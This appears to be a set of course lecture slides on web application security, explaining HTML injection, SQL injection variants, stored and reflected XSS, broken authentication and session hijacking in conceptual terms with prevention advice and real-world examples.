UNIT - 3

OUTLINE

 HTML Injection
 SQL Injection
 XSS Attack, Types of XSS
 Defence mechanism of SQL & XSS
 Broken Authentication & Session Hijacking
 Security Misconfiguration
 Malicious File Inclusion & Directory Traversal

2
HTML INJECTION

 HTML injection is a type of attack where malicious HTML code is

inserted into a website.
 This can lead to a variety of issues, from minor website
defacement to serious data breaches.
 Unlike other web vulnerabilities, HTML injection targets the markup
language that forms the backbone of most websites.
 This attack differs from other web vulnerabilities that exploit server
or database weaknesses because it focuses on manipulating the
structure and content of a webpage.

3
COMMON CAUSES

 Negligence is one of the common root causes of HTML injection.

 A lack of input validation tops the list, allowing attackers to insert
malicious code without hindrance.
 Misconfigured web servers can also be exploited, offering loopholes
for seasoned hackers.
 Lastly, insecure coding practices—stemming from a lack of awareness
or haste—pave the way for these attacks.
 While these causes might seem technical, they often boil down to human
error. Whether it’s a developer overlooking a security measure or a
server admin misconfiguring settings, the human element is ever-present.
4
TYPES OF HTML INJECTION ATTACKS
 Stored HTML Injection: Stored HTML injection, also known
as persistent injection, is a type of attack where the
malicious code is permanently stored on the target server.
This code is then served to users every time they access a
particular page. Once the malicious code is in place, it can
affect a large number of users without the attacker having to
do anything further.
 As an example, a forum post where an attacker might embed
a malicious script that unsuspecting users read, and then
click, which initiates execution of the script, leading to
potential data theft or other malicious outcomes.
5
TYPES OF HTML INJECTION ATTACKS

 Reflected HTML Injection: Unlike stored injections,

reflected attacks are not permanently housed on the
server. Instead, they trick users into executing malicious
code via a URL. This is often achieved through phishing
emails or messages that lure users into clicking on a
compromised link.
 For instance, an attacker might send an email posing as a
trusted entity, urging the recipient to click on a link. This link
contains the malicious payload, which gets executed once
clicked, leading to the desired malicious outcome.
6
 TYPES OF HTML INJECTION ATTACKS
 DOM-based HTML Injection: The attack targets the
Document Object Model (DOM) of a webpage, which
represents the page’s structure. By manipulating the DOM,
attackers can introduce malicious scripts that get executed
client-side.
 Understanding the DOM is crucial for web developers and
security professionals alike. It’s the bridge between HTML
and JavaScript, and any vulnerabilities can lead to
significant security breaches. Being aware of how these
attacks operate is the first step in prevention. 7
POTENTIAL RISKS AND IMPACTS

Data Theft and Breaches

Malware Distribution
Website Defacement

8
PREVENTION AND MITIGATION STRATEGIES

 Input Validation and Sanitization: By ensuring that all user

inputs are strictly validated against a set criterion, one can
effectively block malicious inputs. This involves checking data
types, lengths, and patterns to ensure they adhere to expected
values. Sanitization involves cleaning or modifying user input to
remove any potentially harmful elements.
 Regular Security Audits: Complacency is a security
professional’s worst enemy. Regular security audits are essential to
identify and rectify vulnerabilities before they can be exploited.
Audits involve a thorough examination of a website’s code, 9
infrastructure, and practices to pinpoint potential weak spots.
SQL INJECTION

 A SQL injection attack consists of insertion or “injection” of a SQL

query via the input data from the client to the application.
 A successful SQL injection exploit can read sensitive data from the
database, modify database data (Insert/Update/Delete), execute
administration operations on the database (such as shutdown the
DBMS), recover the content of a given file present on the DBMS file
system and in some cases issue commands to the operating system.
 SQL injection attacks are a type of injection attack, in which SQL
commands are injected into data-plane input in order to affect the
execution of predefined SQL commands. 10
TYPES OF SQL INJECTION

 In-band SQLi: The attacker uses the same channel of communication

to launch their attacks and to gather their results. In-band SQLi’s simplicity
and efficiency make it one of the most common types of SQLi attack. There
are two sub-variations of this method:
 Error-based SQLi—the attacker performs actions that cause the database
to produce error messages. The attacker can potentially use the data
provided by these error messages to gather information about the structure
of the database.
 Union-based SQLi—this technique takes advantage of the UNION SQL
operator, which fuses multiple select statements generated by the
database to get a single HTTP response. This response may contain data
11

that can be leveraged by the attacker.

TYPES OF SQL INJECTION
 Inferential (Blind) SQLi: The attacker sends data payloads to the
server and observes the response and behavior of the server to learn
more about its structure. This method is called blind SQLi because the
data is not transferred from the website database to the attacker.
 Boolean—that attacker sends a SQL query to the database prompting
the application to return a result. The result will vary depending on
whether the query is true or false. Based on the result, the information
within the HTTP response will modify or stay unchanged.
 Time-based—attacker sends a SQL query to the database, which
makes the database wait (for a period in seconds) before it can react.
The attacker can see from the time the database takes to respond, 12
whether a query is true or false.
TYPES OF SQL INJECTION

 Out-of-band SQLi: The attacker can only carry out this form of
attack when certain features are enabled on the database
server used by the web application. This form of attack is primarily
used as an alternative to the in-band and inferential SQLi
techniques.
 Out-of-band SQLi is performed when the attacker can’t use the
same channel to launch the attack and gather information, or when
a server is too slow or unstable for these actions to be performed.
These techniques count on the capacity of the server to create DNS
or HTTP requests to transfer data to an attacker. 13
DEFENCE MECHANISM AGAINST SQL INJECTION

 [Link]

14
XSS ATTACK

 Cross-Site Scripting (XSS) attacks are a type of injection, in

which malicious scripts are injected into otherwise benign and
trusted websites.
 XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to
a different end user.
 Because it thinks the script came from a trusted source, the
malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that
site. 15
REFLECTED XSS ATTACKS

 Reflected attacks are those where the injected script is reflected off the web
server, such as in an error message, search result, or any other response that
includes some or all of the input sent to the server as part of the request.
 Reflected attacks are delivered to victims via another route, such as in an e-mail
message, or on some other website.
 When a user is tricked into clicking on a malicious link, submitting a specially
crafted form, or even just browsing to a malicious site, the injected code travels
to the vulnerable web site, which reflects the attack back to the user’s browser.
 Reflected XSS is also sometimes referred to as Non-Persistent or Type-I XSS 16
STORED XSS ATTACKS

 Stored attacks are those where the injected script is

permanently stored on the target servers, such as in a
database, in a message forum, visitor log, comment
field, etc.
 The victim then retrieves the malicious script from the
server when it requests the stored information.
 Stored XSS is also sometimes referred to as Persistent or
Type-II XSS.
17
XSS ATTACK CONSEQUENCES

 XSS can cause a variety of problems for the end user that range in
severity from an annoyance to complete account compromise.
 The most severe XSS attacks involve disclosure of the user’s session
cookie, allowing an attacker to hijack the user’s session and take
over the account.
 Other damaging attacks include the disclosure of end user files,
installation of Trojan horse programs, redirecting the user to some
other page or site, or modifying presentation of content.

18
DEFENCE MECHANISM AGAINST XSS

 [Link]

19
BROKEN AUTHENTICATION

 Broken authentication is a critical vulnerability in web applications where

the authentication and session management mechanisms are
flawed or improperly implemented, allowing attackers to compromise
passwords, keys, or session tokens, or to exploit other
implementation flaws to assume other users’ identities.
 The term ‘session management’ refers to the process of maintaining a
user’s state and data across multiple requests.
 When a user logs into an application, their credentials are authenticated,
and a session is established. This session persists as the user interacts
with the application, allowing them to stay logged in. If the session
management is mishandled, it can lead to broken authentication. 20
BROKEN AUTHENTICATION

 This vulnerability can arise from numerous scenarios, including:

 Weak password policies that allow the use of common or easily
guessable passwords.
 Improper session management, such as not properly setting session
timeouts or protecting session IDs. When session IDs are exposed in the
URL.
 Inadequate handling of user passwords, such as not hashing and salting
them properly.
 According to the Open Web Application Security Project (OWASP), broken
authentication is one of the most severe threats to web applications and
21
APIs.
BROKEN AUTHENTICATION

 Use of Passwords as the Only Authentication Factor

 Relying solely on passwords for user authentication is a significant
vulnerability in web application security.
 Passwords, are often weak due to poor user practices such as using
easy-to-guess passwords or reusing the same password.
 Attackersexploit weak or reused passwords through various
methods like phishing attacks, credential stuffing, or brute
force attacks.
 This vulnerability becomes more critical when additional layers of
22
security, like multi-factor authentication (MFA), are not in place.
BROKEN AUTHENTICATION

 Application Session Timeouts Aren’t Set Properly

 When a user logs into a web application, a session is established. This
session should expire after a period of inactivity to prevent
unauthorized access in case the user leaves their device unattended.
If the session timeout is not properly set, it could allow an attacker to
hijack the session and gain access to the user’s account.
 Inadequate session timeouts can also lead to session fixation
attacks, where an attacker induces a user to use a specific session ID,
and then uses that same session ID to gain unauthorized access to the
user’s account. 23
BROKEN AUTHENTICATION

 Passwords Not Properly Hashed and Salted

 Hashing is a process that transforms a password into a unique,
fixed-size string of characters, which is then stored in the system.
 Salting involves adding an additional, random string of characters
to the password before it’s hashed.
 If an attacker manages to breach the system and gain access to the
password data, and if the passwords are not properly hashed and
salted, they could potentially crack the passwords using various
methods such as brute force attacks, dictionary attacks, or
rainbow table attacks.
24
IMPACT OF BROKEN AUTHENTICATION ATTACK

 Foran end-user, a broken authentication attack could mean

unauthorized access to their account, leading to the theft of sensitive
personal data such as credit card information, social security
numbers, and more.
 For businesses, the consequences can be even more severe. A
successful attack could potentially give cybercriminals access to
privileged accounts, allowing them to manipulate data, perform
malicious actions, or even take control of the entire system.
 This could lead to substantial financial losses, damage to the
organization’s reputation, loss of customer trust, and potential legal
implications. 25
HOW TO FIX BROKEN AUTHENTICATION

 Control Session Length

 The session length is the duration in which the session
remains active.
 Keep session lengths as short as possible without
affecting the user experience.
 This practice reduces the window of opportunity for an
attacker to exploit the session.
 Moreover, idle session timeouts should be implemented.26
HOW TO FIX BROKEN AUTHENTICATION

 Rotate and Invalidate Session IDs

 Rotating session IDs means changing the session ID after a
certain period or after certain critical operations. This practice
makes it harder for an attacker to predict or guess the session ID.
 In addition to rotating session IDs, it is also crucial to invalidate
them when they are no longer needed. For example, when a user
logs out, their session ID should be invalidated immediately.
 This prevents an attacker from using an old session ID to gain
unauthorized access to the system. 27
HOW TO FIX BROKEN AUTHENTICATION

 Multi-factor Authentication
 MFA is a method of authentication that requires users to provide
two or more verification factors to gain access to a resource.
 The factors used in MFA can be something the user knows (like a
password), something the user has (like a physical token or a
smartphone), or something the user is (like a fingerprint or other
biometric trait).
 By requiring multiple forms of verification, MFA significantly
enhances the security of your system. 28
SESSION HIJACKING
 Session hijacking is a cyberattack in which bad actors gain
unauthorized access to a user’s active website or application
session.
 These attacks exploit vulnerabilities in web session management by
enabling the cyberattacker to impersonate a legitimate user.
 Session hijacking involves intercepting or guessing the session
identifier, a unique token assigned to a user upon login.
 Obtaining access to this identifier enables the attacker to assume
the user’s identity within the system, potentially accessing sensitive
information, making unauthorized transactions, or performing other
malicious actions. 29
HOW SESSION HIJACKING WORKS
 Initial authentication: The legitimate user enters their credentials
to log into a website or application. The server verifies these
credentials and establishes a new session connection for the user.
 Session ID generation: Upon successful authentication, the server
creates a unique session identifier. This ID is typically a long,
random string intentionally designed to be challenging to guess. The
server sends this ID to the user's browser, where it’s usually stored as
a cookie.
 Normal user activity: The authenticated user interacts with the
website or application. Each request they make to the server includes
the session ID, allowing the server to assign that particular request to
30

the user’s authenticated session and maintain their state.

HOW SESSION HIJACKING WORKS

 Attacker intervention: The attacker uses sophisticated techniques to

predict or intercept the session ID. Some techniques they might use
include exploiting network vulnerabilities, leveraging malware, or
exploiting weaknesses in the website’s session management system.
 Session ID acquisition: The attacker successfully obtains a valid
session ID through one or more attack vectors. They can accomplish this
through real-time interception or by exploiting predictable session ID
generation patterns.
 Impersonation: The attacker crafts requests to the server that include
the stolen session ID. These requests appear to come from the
legitimate user from the server’s perspective, as the session ID is valid. 31
HOW SESSION HIJACKING WORKS
 Unauthorized access: The server processes the attacker’s requests as
if they were from a legitimate user. This grants the attacker the same
access and privileges as the original user, potentially compromising
sensitive data or functionality.
 Malicious activities: With full access to the user’s session, the attacker
can perform various unauthorized actions. These may include viewing
or modifying personal information, initiating financial transactions, or
using the compromised account to launch further attacks.
 Session termination: The hijacked session ends either when the
legitimate user logs out (potentially locking out the attacker), when the
session naturally expires due to inactivity, or when the attacker ends
32
their malicious activities to avoid detection.
EXAMPLES OF SESSION HIJACKING
 Zoom bombing
 During the COVID-19 pandemic, video conferencing
platforms like Zoom became targets for session hijackers.
Attackers exploited vulnerabilities in meeting settings to
gain unauthorized access to private video sessions.
 Some hijackers would disrupt meetings by shouting
profanities, sharing offensive content etc.
 In response, Zoom implemented enhanced privacy
protections, including meeting passwords and waiting 33

rooms, helping hosts better control participant access.

EXAMPLES OF SESSION HIJACKING

 Slack
 This flaw allowed attackers to force users into fake session
redirects, enabling the theft of session cookies. With these
stolen cookies, attackers could gain unauthorized access to all
data shared within a user’s Slack account, potentially
compromising sensitive organizational information.
 Slack’s security team responded swiftly, patching the
vulnerability within 24 hours of its discovery, demonstrating
the importance of rapid response to security threats. 34
EXAMPLES OF SESSION HIJACKING

 GitLab
 In 2017, a security researcher identified a severe
vulnerability in GitLab’s session management. The
platform exposed users’ session tokens directly in
URLs and employed persistent tokens that never
expired.
 GitLab addressed this issue by revising its token usage
and storage methods, emphasizing the critical nature of
proper session token management in web applications. 35
EXAMPLES OF SESSION HIJACKING

 GitLab
 In 2017, a security researcher identified a severe
vulnerability in GitLab’s session management. The
platform exposed users’ session tokens directly in URLs
and employed persistent tokens that never expired.
 GitLab addressed this issue by revising its token usage
and storage methods, emphasizing the critical nature of
proper session token management in web applications. 36
SECURITY MISCONFIGURATIONS

 [Link]

37
FILE INCLUSION VULNERABILITY

[Link]
ies
/

38